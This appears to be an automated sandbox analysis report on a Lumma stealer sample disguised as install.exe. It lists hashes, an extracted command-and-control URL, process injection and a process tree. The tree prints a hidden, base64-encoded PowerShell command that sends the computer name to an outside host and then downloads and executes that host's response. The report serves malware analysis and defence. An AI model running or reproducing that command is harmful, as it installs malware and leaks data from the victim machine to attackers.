Overview
overview
10Static
static
3183c6aa694...90.exe
windows7-x64
10183c6aa694...90.exe
windows10-2004-x64
10install.exe
windows7-x64
10install.exe
windows10-2004-x64
10jre/Welcome.html
windows7-x64
3jre/Welcome.html
windows10-2004-x64
3jre/bin/JA...32.dll
windows7-x64
3jre/bin/JA...32.dll
windows10-2004-x64
3jre/bin/JA...ge.dll
windows7-x64
3jre/bin/JA...ge.dll
windows10-2004-x64
3jre/bin/Ja...32.dll
windows7-x64
3jre/bin/Ja...32.dll
windows10-2004-x64
3jre/bin/Ja...ge.dll
windows7-x64
3jre/bin/Ja...ge.dll
windows10-2004-x64
3jre/bin/Wi...32.dll
windows7-x64
3jre/bin/Wi...32.dll
windows10-2004-x64
3jre/bin/Wi...ge.dll
windows7-x64
3jre/bin/Wi...ge.dll
windows10-2004-x64
3jre/bin/awt.dll
windows7-x64
3jre/bin/awt.dll
windows10-2004-x64
3jre/bin/bci.dll
windows7-x64
3jre/bin/bci.dll
windows10-2004-x64
3jre/bin/cl...vm.dll
windows7-x64
3jre/bin/cl...vm.dll
windows10-2004-x64
3jre/bin/dcpr.dll
windows7-x64
3jre/bin/dcpr.dll
windows10-2004-x64
3jre/bin/de...se.dll
windows7-x64
3jre/bin/de...se.dll
windows10-2004-x64
3jre/bin/deploy.dll
windows7-x64
3jre/bin/deploy.dll
windows10-2004-x64
3jre/bin/dt_shmem.dll
windows7-x64
3jre/bin/dt_shmem.dll
windows10-2004-x64
3Analysis
-
max time kernel
144s -
max time network
154s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
21-11-2024 19:10
Static task
static1
Behavioral task
behavioral1
Sample
183c6aa694124103e3896ee7b71175f4a81d9533218617cb80d60d9307b53c90.exe
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
183c6aa694124103e3896ee7b71175f4a81d9533218617cb80d60d9307b53c90.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
install.exe
Resource
win7-20240903-en
Behavioral task
behavioral4
Sample
install.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral5
Sample
jre/Welcome.html
Resource
win7-20241010-en
Behavioral task
behavioral6
Sample
jre/Welcome.html
Resource
win10v2004-20241007-en
Behavioral task
behavioral7
Sample
jre/bin/JAWTAccessBridge-32.dll
Resource
win7-20240903-en
Behavioral task
behavioral8
Sample
jre/bin/JAWTAccessBridge-32.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral9
Sample
jre/bin/JAWTAccessBridge.dll
Resource
win7-20240729-en
Behavioral task
behavioral10
Sample
jre/bin/JAWTAccessBridge.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral11
Sample
jre/bin/JavaAccessBridge-32.dll
Resource
win7-20240903-en
Behavioral task
behavioral12
Sample
jre/bin/JavaAccessBridge-32.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral13
Sample
jre/bin/JavaAccessBridge.dll
Resource
win7-20240903-en
Behavioral task
behavioral14
Sample
jre/bin/JavaAccessBridge.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral15
Sample
jre/bin/WindowsAccessBridge-32.dll
Resource
win7-20241023-en
Behavioral task
behavioral16
Sample
jre/bin/WindowsAccessBridge-32.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral17
Sample
jre/bin/WindowsAccessBridge.dll
Resource
win7-20240708-en
Behavioral task
behavioral18
Sample
jre/bin/WindowsAccessBridge.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral19
Sample
jre/bin/awt.dll
Resource
win7-20240903-en
Behavioral task
behavioral20
Sample
jre/bin/awt.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral21
Sample
jre/bin/bci.dll
Resource
win7-20240903-en
Behavioral task
behavioral22
Sample
jre/bin/bci.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral23
Sample
jre/bin/client/jvm.dll
Resource
win7-20241010-en
Behavioral task
behavioral24
Sample
jre/bin/client/jvm.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral25
Sample
jre/bin/dcpr.dll
Resource
win7-20240903-en
Behavioral task
behavioral26
Sample
jre/bin/dcpr.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral27
Sample
jre/bin/decora_sse.dll
Resource
win7-20240903-en
Behavioral task
behavioral28
Sample
jre/bin/decora_sse.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral29
Sample
jre/bin/deploy.dll
Resource
win7-20240903-en
Behavioral task
behavioral30
Sample
jre/bin/deploy.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral31
Sample
jre/bin/dt_shmem.dll
Resource
win7-20240903-en
Behavioral task
behavioral32
Sample
jre/bin/dt_shmem.dll
Resource
win10v2004-20241007-en
General
-
Target
install.exe
-
Size
136KB
-
MD5
fca89c62d6ea9f979b3a8d21ee2c4f55
-
SHA1
bd77809998b5cfef93e3c34af3ddb8292f549d44
-
SHA256
6b069e5b450898615e709275bc0a53b529f171301a603093bdc17ebd784e0e34
-
SHA512
f1f1f30d0c07c343d9709dd4a6405751de678886703bd59f2d72751f3d470ca88389b3ce3ba5966282e6f60ae68f13de722e885f4bd1bfae2aad60323edf7df0
-
SSDEEP
1536:xZ2FWSNhd/4131iO08SKKAP7wBwp8wZtE:T2ddQ131i1pKJP7w2p
Malware Config
Extracted
lumma
https://quotedjizwe.cyou/api
Signatures
-
Lumma family
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2220 powershell.exe -
Executes dropped EXE 2 IoCs
pid Process 2792 EASteamProxy.exe 1608 EASteamProxy.exe -
Loads dropped DLL 20 IoCs
pid Process 2884 cmd.exe 2792 EASteamProxy.exe 2792 EASteamProxy.exe 2792 EASteamProxy.exe 2792 EASteamProxy.exe 2792 EASteamProxy.exe 2792 EASteamProxy.exe 2792 EASteamProxy.exe 2792 EASteamProxy.exe 2792 EASteamProxy.exe 2792 EASteamProxy.exe 1608 EASteamProxy.exe 1608 EASteamProxy.exe 1608 EASteamProxy.exe 1608 EASteamProxy.exe 1608 EASteamProxy.exe 1608 EASteamProxy.exe 1608 EASteamProxy.exe 1608 EASteamProxy.exe 1608 EASteamProxy.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 2 pastebin.com 3 pastebin.com -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1608 set thread context of 1692 1608 EASteamProxy.exe 65 -
System Location Discovery: System Language Discovery 1 TTPs 24 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language more.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WMIC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language chcp.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language more.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WMIC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language more.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language install.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WMIC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language chcp.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language chcp.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language chcp.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language chcp.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AcroRd32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language javaw.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 2220 powershell.exe 2792 EASteamProxy.exe 1608 EASteamProxy.exe 1608 EASteamProxy.exe 1692 cmd.exe 1692 cmd.exe -
Suspicious behavior: MapViewOfSection 2 IoCs
pid Process 1608 EASteamProxy.exe 1692 cmd.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeIncreaseQuotaPrivilege 1616 WMIC.exe Token: SeSecurityPrivilege 1616 WMIC.exe Token: SeTakeOwnershipPrivilege 1616 WMIC.exe Token: SeLoadDriverPrivilege 1616 WMIC.exe Token: SeSystemProfilePrivilege 1616 WMIC.exe Token: SeSystemtimePrivilege 1616 WMIC.exe Token: SeProfSingleProcessPrivilege 1616 WMIC.exe Token: SeIncBasePriorityPrivilege 1616 WMIC.exe Token: SeCreatePagefilePrivilege 1616 WMIC.exe Token: SeBackupPrivilege 1616 WMIC.exe Token: SeRestorePrivilege 1616 WMIC.exe Token: SeShutdownPrivilege 1616 WMIC.exe Token: SeDebugPrivilege 1616 WMIC.exe Token: SeSystemEnvironmentPrivilege 1616 WMIC.exe Token: SeRemoteShutdownPrivilege 1616 WMIC.exe Token: SeUndockPrivilege 1616 WMIC.exe Token: SeManageVolumePrivilege 1616 WMIC.exe Token: 33 1616 WMIC.exe Token: 34 1616 WMIC.exe Token: 35 1616 WMIC.exe Token: SeIncreaseQuotaPrivilege 1616 WMIC.exe Token: SeSecurityPrivilege 1616 WMIC.exe Token: SeTakeOwnershipPrivilege 1616 WMIC.exe Token: SeLoadDriverPrivilege 1616 WMIC.exe Token: SeSystemProfilePrivilege 1616 WMIC.exe Token: SeSystemtimePrivilege 1616 WMIC.exe Token: SeProfSingleProcessPrivilege 1616 WMIC.exe Token: SeIncBasePriorityPrivilege 1616 WMIC.exe Token: SeCreatePagefilePrivilege 1616 WMIC.exe Token: SeBackupPrivilege 1616 WMIC.exe Token: SeRestorePrivilege 1616 WMIC.exe Token: SeShutdownPrivilege 1616 WMIC.exe Token: SeDebugPrivilege 1616 WMIC.exe Token: SeSystemEnvironmentPrivilege 1616 WMIC.exe Token: SeRemoteShutdownPrivilege 1616 WMIC.exe Token: SeUndockPrivilege 1616 WMIC.exe Token: SeManageVolumePrivilege 1616 WMIC.exe Token: 33 1616 WMIC.exe Token: 34 1616 WMIC.exe Token: 35 1616 WMIC.exe Token: SeIncreaseQuotaPrivilege 608 WMIC.exe Token: SeSecurityPrivilege 608 WMIC.exe Token: SeTakeOwnershipPrivilege 608 WMIC.exe Token: SeLoadDriverPrivilege 608 WMIC.exe Token: SeSystemProfilePrivilege 608 WMIC.exe Token: SeSystemtimePrivilege 608 WMIC.exe Token: SeProfSingleProcessPrivilege 608 WMIC.exe Token: SeIncBasePriorityPrivilege 608 WMIC.exe Token: SeCreatePagefilePrivilege 608 WMIC.exe Token: SeBackupPrivilege 608 WMIC.exe Token: SeRestorePrivilege 608 WMIC.exe Token: SeShutdownPrivilege 608 WMIC.exe Token: SeDebugPrivilege 608 WMIC.exe Token: SeSystemEnvironmentPrivilege 608 WMIC.exe Token: SeRemoteShutdownPrivilege 608 WMIC.exe Token: SeUndockPrivilege 608 WMIC.exe Token: SeManageVolumePrivilege 608 WMIC.exe Token: 33 608 WMIC.exe Token: 34 608 WMIC.exe Token: 35 608 WMIC.exe Token: SeIncreaseQuotaPrivilege 608 WMIC.exe Token: SeSecurityPrivilege 608 WMIC.exe Token: SeTakeOwnershipPrivilege 608 WMIC.exe Token: SeLoadDriverPrivilege 608 WMIC.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
pid Process 1072 javaw.exe 1072 javaw.exe 1104 AcroRd32.exe 1104 AcroRd32.exe 1104 AcroRd32.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2052 wrote to memory of 1072 2052 install.exe 31 PID 2052 wrote to memory of 1072 2052 install.exe 31 PID 2052 wrote to memory of 1072 2052 install.exe 31 PID 2052 wrote to memory of 1072 2052 install.exe 31 PID 2052 wrote to memory of 1072 2052 install.exe 31 PID 2052 wrote to memory of 1072 2052 install.exe 31 PID 2052 wrote to memory of 1072 2052 install.exe 31 PID 1072 wrote to memory of 760 1072 javaw.exe 32 PID 1072 wrote to memory of 760 1072 javaw.exe 32 PID 1072 wrote to memory of 760 1072 javaw.exe 32 PID 1072 wrote to memory of 760 1072 javaw.exe 32 PID 1072 wrote to memory of 760 1072 javaw.exe 32 PID 1072 wrote to memory of 760 1072 javaw.exe 32 PID 1072 wrote to memory of 760 1072 javaw.exe 32 PID 760 wrote to memory of 540 760 cmd.exe 34 PID 760 wrote to memory of 540 760 cmd.exe 34 PID 760 wrote to memory of 540 760 cmd.exe 34 PID 760 wrote to memory of 540 760 cmd.exe 34 PID 760 wrote to memory of 540 760 cmd.exe 34 PID 760 wrote to memory of 540 760 cmd.exe 34 PID 760 wrote to memory of 540 760 cmd.exe 34 PID 760 wrote to memory of 2584 760 cmd.exe 35 PID 760 wrote to memory of 2584 760 cmd.exe 35 PID 760 wrote to memory of 2584 760 cmd.exe 35 PID 760 wrote to memory of 2584 760 cmd.exe 35 PID 1072 wrote to memory of 2896 1072 javaw.exe 36 PID 1072 wrote to memory of 2896 1072 javaw.exe 36 PID 1072 wrote to memory of 2896 1072 javaw.exe 36 PID 1072 wrote to memory of 2896 1072 javaw.exe 36 PID 1072 wrote to memory of 2896 1072 javaw.exe 36 PID 1072 wrote to memory of 2896 1072 javaw.exe 36 PID 1072 wrote to memory of 2896 1072 javaw.exe 36 PID 2896 wrote to memory of 2812 2896 cmd.exe 38 PID 2896 wrote to memory of 2812 2896 cmd.exe 38 PID 2896 wrote to memory of 2812 2896 cmd.exe 38 PID 2896 wrote to memory of 2812 2896 cmd.exe 38 PID 2896 wrote to memory of 2812 2896 cmd.exe 38 PID 2896 wrote to memory of 2812 2896 cmd.exe 38 PID 2896 wrote to memory of 2812 2896 cmd.exe 38 PID 2896 wrote to memory of 1616 2896 cmd.exe 39 PID 2896 wrote to memory of 1616 2896 cmd.exe 39 PID 2896 wrote to memory of 1616 2896 cmd.exe 39 PID 2896 wrote to memory of 1616 2896 cmd.exe 39 PID 2896 wrote to memory of 1616 2896 cmd.exe 39 PID 2896 wrote to memory of 1616 2896 cmd.exe 39 PID 2896 wrote to memory of 1616 2896 cmd.exe 39 PID 2896 wrote to memory of 2664 2896 cmd.exe 40 PID 2896 wrote to memory of 2664 2896 cmd.exe 40 PID 2896 wrote to memory of 2664 2896 cmd.exe 40 PID 2896 wrote to memory of 2664 2896 cmd.exe 40 PID 2896 wrote to memory of 2664 2896 cmd.exe 40 PID 2896 wrote to memory of 2664 2896 cmd.exe 40 PID 2896 wrote to memory of 2664 2896 cmd.exe 40 PID 1072 wrote to memory of 2940 1072 javaw.exe 42 PID 1072 wrote to memory of 2940 1072 javaw.exe 42 PID 1072 wrote to memory of 2940 1072 javaw.exe 42 PID 1072 wrote to memory of 2940 1072 javaw.exe 42 PID 1072 wrote to memory of 2940 1072 javaw.exe 42 PID 1072 wrote to memory of 2940 1072 javaw.exe 42 PID 1072 wrote to memory of 2940 1072 javaw.exe 42 PID 2940 wrote to memory of 912 2940 cmd.exe 44 PID 2940 wrote to memory of 912 2940 cmd.exe 44 PID 2940 wrote to memory of 912 2940 cmd.exe 44 PID 2940 wrote to memory of 912 2940 cmd.exe 44
Processes
-
C:\Users\Admin\AppData\Local\Temp\install.exe"C:\Users\Admin\AppData\Local\Temp\install.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2052 -
C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe"C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe" -Dfile.encoding=UTF-8 -classpath "lib\.;lib\..;lib\asm-all.jar;lib\dn-compiled-module.jar;lib\dn-php-sdk.jar;lib\gson.jar;lib\jphp-app-framework.jar;lib\jphp-core.jar;lib\jphp-desktop-ext.jar;lib\jphp-gui-ext.jar;lib\jphp-json-ext.jar;lib\jphp-runtime.jar;lib\jphp-xml-ext.jar;lib\jphp-zend-ext.jar;lib\jphp-zip-ext.jar;lib\slf4j-api.jar;lib\slf4j-simple.jar;lib\zt-zip.jar" org.develnext.jphp.ext.javafx.FXLauncher2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1072 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 65001>nul & C:\Windows\SysNative\reg.exe query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v "CurrentBuild""3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:760 -
C:\Windows\SysWOW64\chcp.comC:\Windows\System32\chcp.com 650014⤵
- System Location Discovery: System Language Discovery
PID:540
-
-
C:\Windows\system32\reg.exeC:\Windows\SysNative\reg.exe query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v "CurrentBuild"4⤵PID:2584
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 866>nul & C:\Windows\System32\wbem\wmic.exe CPU get Name /Format:List | C:\Windows\System32\more.com"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2896 -
C:\Windows\SysWOW64\chcp.comC:\Windows\System32\chcp.com 8664⤵
- System Location Discovery: System Language Discovery
PID:2812
-
-
C:\Windows\SysWOW64\wbem\WMIC.exeC:\Windows\System32\wbem\wmic.exe CPU get Name /Format:List4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1616
-
-
C:\Windows\SysWOW64\more.comC:\Windows\System32\more.com4⤵
- System Location Discovery: System Language Discovery
PID:2664
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 866>nul & C:\Windows\System32\wbem\wmic.exe Path Win32_VideoController Get AdapterCompatibility /Format:List | C:\Windows\System32\more.com"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2940 -
C:\Windows\SysWOW64\chcp.comC:\Windows\System32\chcp.com 8664⤵
- System Location Discovery: System Language Discovery
PID:912
-
-
C:\Windows\SysWOW64\wbem\WMIC.exeC:\Windows\System32\wbem\wmic.exe Path Win32_VideoController Get AdapterCompatibility /Format:List4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:608
-
-
C:\Windows\SysWOW64\more.comC:\Windows\System32\more.com4⤵
- System Location Discovery: System Language Discovery
PID:1132
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 866>nul & C:\Windows\System32\wbem\wmic.exe path Win32_ComputerSystem get TotalPhysicalMemory /Format:List | C:\Windows\System32\more.com"3⤵
- System Location Discovery: System Language Discovery
PID:2696 -
C:\Windows\SysWOW64\chcp.comC:\Windows\System32\chcp.com 8664⤵
- System Location Discovery: System Language Discovery
PID:1280
-
-
C:\Windows\SysWOW64\wbem\WMIC.exeC:\Windows\System32\wbem\wmic.exe path Win32_ComputerSystem get TotalPhysicalMemory /Format:List4⤵
- System Location Discovery: System Language Discovery
PID:1608
-
-
C:\Windows\SysWOW64\more.comC:\Windows\System32\more.com4⤵
- System Location Discovery: System Language Discovery
PID:1684
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 65001>nul & C:\Windows\SysNative\reg.exe query "HKU\S-1-5-19""3⤵
- System Location Discovery: System Language Discovery
PID:1340 -
C:\Windows\SysWOW64\chcp.comC:\Windows\System32\chcp.com 650014⤵
- System Location Discovery: System Language Discovery
PID:1252
-
-
C:\Windows\system32\reg.exeC:\Windows\SysNative\reg.exe query "HKU\S-1-5-19"4⤵PID:2980
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {$script = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('DQokcj0naHR0cDovL2NhdHNpLm5ldC9pbmNhbGwucGhwP2NvbXBOYW1lPScrJGVudjpjb21wdXRlcm5hbWU7IFtuZXQuU2VydmljRXBPaU50bUFuYWdlUl06OnNFQ3VyaVRZcFJPVG9jT2wgPSBbbkVULnNlQ1VSSVR5cFJPVG9jb0xUWXBlXTo6VGxzMTI7ICR0dHAgPSBpd3IgJHIgLVVzZUJhc2ljUGFyc2luZyAtVXNlckFnZW50ICdNb3ppbGxhLzUuMCAoV2luZG93cyBOVCA2LjEpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIENocm9tZS84MS4wLjQ0NC4xNDMgU2FmYXJpLzUzNy4zNic7IGlleCAkdHRwLkNvbnRlbnQ7')); Invoke-Expression $script}"3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2220
-
-
C:\Windows\SysWOW64\cmd.execmd /c "cd /d "C:\Users\Admin\AppData\Local\Temp/f9d4395bf27462aa0d2c57efd4ce6cb3/" && (for %F in (*.exe) do start "" "%F")"3⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2884 -
C:\Users\Admin\AppData\Local\Temp\f9d4395bf27462aa0d2c57efd4ce6cb3\EASteamProxy.exe"EASteamProxy.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:2792 -
C:\Users\Admin\AppData\Roaming\Serverdownload\EASteamProxy.exeC:\Users\Admin\AppData\Roaming\Serverdownload\EASteamProxy.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:1608 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe6⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:1692 -
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe7⤵
- System Location Discovery: System Language Discovery
PID:1884
-
-
-
-
-
-
C:\Windows\SysWOW64\explorer.exeexplorer C:\Users\Admin\AppData\Local\Temp\a8d90163713ca47df12b6fddba9abda0.pdf3⤵
- System Location Discovery: System Language Discovery
PID:2416
-
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding1⤵PID:1988
-
C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\a8d90163713ca47df12b6fddba9abda0.pdf"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:1104
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
70KB
MD549aebf8cbd62d92ac215b2923fb1b9f5
SHA11723be06719828dda65ad804298d0431f6aff976
SHA256b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b
-
Filesize
181KB
MD54ea6026cf93ec6338144661bf1202cd1
SHA1a1dec9044f750ad887935a01430bf49322fbdcb7
SHA2568efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA5126c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b
-
Filesize
51KB
MD5acfffe6de49ab6bbcb590e95d558111b
SHA151d7b4a4ef2851f4787805bd2eebc61f9f62ae34
SHA256fd0bc347f27e479b565d6095bfdc96ef2f42a7ae8649c40e1e702c8f16ab6217
SHA51294fd4a2de31420576169b79c9617fb1eed4778fb50c17a9c8587b123169022e9338fe8d4b89bb5de5b06367eed6737e739423416c8be3f7f5f24b75b3b3ee28e
-
Filesize
564KB
MD51ba6d1cf0508775096f9e121a24e5863
SHA1df552810d779476610da3c8b956cc921ed6c91ae
SHA25674892d9b4028c05debaf0b9b5d9dc6d22f7956fa7d7eee00c681318c26792823
SHA5129887d9f5838aa1555ea87968e014edfe2f7747f138f1b551d1f609bc1d5d8214a5fdab0d76fcac98864c1da5eb81405ca373b2a30cb12203c011d89ea6d069af
-
Filesize
34KB
MD569d96e09a54fbc5cf92a0e084ab33856
SHA1b4629d51b5c4d8d78ccb3370b40a850f735b8949
SHA256a3a1199de32bbbc8318ec33e2e1ce556247d012851e4b367fe853a51e74ce4ee
SHA5122087827137c473cdbec87789361ed34fad88c9fe80ef86b54e72aea891d91af50b17b7a603f9ae2060b3089ce9966fad6d7fbe22dee980c07ed491a75503f2cf
-
Filesize
6.0MB
MD52a7f32421b71aaeebd6287f55acdf983
SHA1217db3af7575622d58f94845b7ee6ceffd6e1c0f
SHA256d0e476c7573735b01ba7893b7e513ac463316b50b5d6e238878a8567b0b1bc86
SHA512b5839c867d3ea09f0796482f8040ed5ebb9ddf9917df8ce76ed675e377af97ab0ac06917af0c2d8401afa30c5deb7052e7218c779dd731c7774ca10dc1306bf5
-
Filesize
1.3MB
MD5c24c89879410889df656e3a961c59bcc
SHA125a9e4e545e86b0a5fe14ee0147746667892fabd
SHA256739bedcfc8eb860927eb2057474be5b39518aaaa6703f9f85307a432fa1f236e
SHA5120542c431049e4fd40619579062d206396bef2f6dadadbf9294619c918b9e6c96634dcd404b78c6045974295126ec35dd842c6ec8f42279d9598b57a751cd0034
-
Filesize
106KB
MD549c96cecda5c6c660a107d378fdfc3d4
SHA100149b7a66723e3f0310f139489fe172f818ca8e
SHA25669320f278d90efaaeb67e2a1b55e5b0543883125834c812c8d9c39676e0494fc
SHA512e09e072f3095379b0c921d41d6e64f4f1cd78400594a2317cfb5e5dca03dedb5a8239ed89905c9e967d1acb376b0585a35addf6648422c7ddb472ce38b1ba60d
-
Filesize
48KB
MD5cf0a1c4776ffe23ada5e570fc36e39fe
SHA12050fadecc11550ad9bde0b542bcf87e19d37f1a
SHA2566fd366a691ed68430bcd0a3de3d8d19a0cb2102952bfc140bbef4354ed082c47
SHA512d95cd98d22ca048d0fc5bca551c9db13d6fa705f6af120bbbb621cf2b30284bfdc7320d0a819bb26dab1e0a46253cc311a370bed4ef72ecb60c69791ed720168
-
Filesize
19KB
MD55df7aef6e2e2691eb57558a45eba260e
SHA1a9e9053a5a2810f89ff349c5e6bfc98a5271750f
SHA25693aa2b9642df06986e0cf718a3708d22a30ced07e93c1d16f999f456de982a17
SHA5121432dc775add2f5ec4c30964fcd58f5e2dde836ebdc10cf9f2404a0e2915d98c89cfc310d2ec16b51c2a3791352c4096d33715628d58db5064d65c35578c0789
-
Filesize
799KB
MD5e2658cb392d04822f8d80aad17f8f9ce
SHA1a5a93b010269939482714985b5bcea25e806088d
SHA256aec797462aad55a6b688ceb5e1c83c874c3828d4dfc8f2460e5c01342f7728e4
SHA51231c95479e522d589a0f659a0af0e771ba5634c1515fcffb161b09c97ae60834266846a640bf3a18969a618d1bcb9eff5161bb54108d47b4379fdbaba2a8b67b6
-
Filesize
2.7MB
MD528dea3e780552eb5c53b3b9b1f556628
SHA155dccd5b30ce0363e8ebdfeb1cca38d1289748b8
SHA25652415829d85c06df8724a3d3d00c98f12beabf5d6f3cbad919ec8000841a86e8
SHA51219dfe5f71901e43ea34d257f693ae1a36433dbdbcd7c9440d9b0f9eea24de65c4a8fe332f7b88144e1a719a6ba791c2048b4dd3e5b1ed0fdd4c813603ad35112
-
Filesize
669KB
MD54ad03043a32e9a1ef64115fc1ace5787
SHA1352e0e3a628c8626cff7eed348221e889f6a25c4
SHA256a0e43cbc4a2d8d39f225abd91980001b7b2b5001e8b2b8292537ae39b17b85d1
SHA512edfae3660a5f19a9deda0375efba7261d211a74f1d8b6bf1a8440fed4619c4b747aca8301d221fd91230e7af1dab73123707cc6eda90e53eb8b6b80872689ba6
-
Filesize
291KB
MD56b4ab6e60364c55f18a56a39021b74a6
SHA139cac2889d8ca497ee0d8434fc9f6966f18fa336
SHA2561db3fd414039d3e5815a5721925dd2e0a3a9f2549603c6cab7c49b84966a1af3
SHA512c08de8c6e331d13dfe868ab340e41552fc49123a9f782a5a63b95795d5d979e68b5a6ab171153978679c0791dc3e3809c883471a05864041ce60b240ccdd4c21
-
Filesize
1.0MB
MD5d6ad61c88061b03d87d8c77f3517b5fb
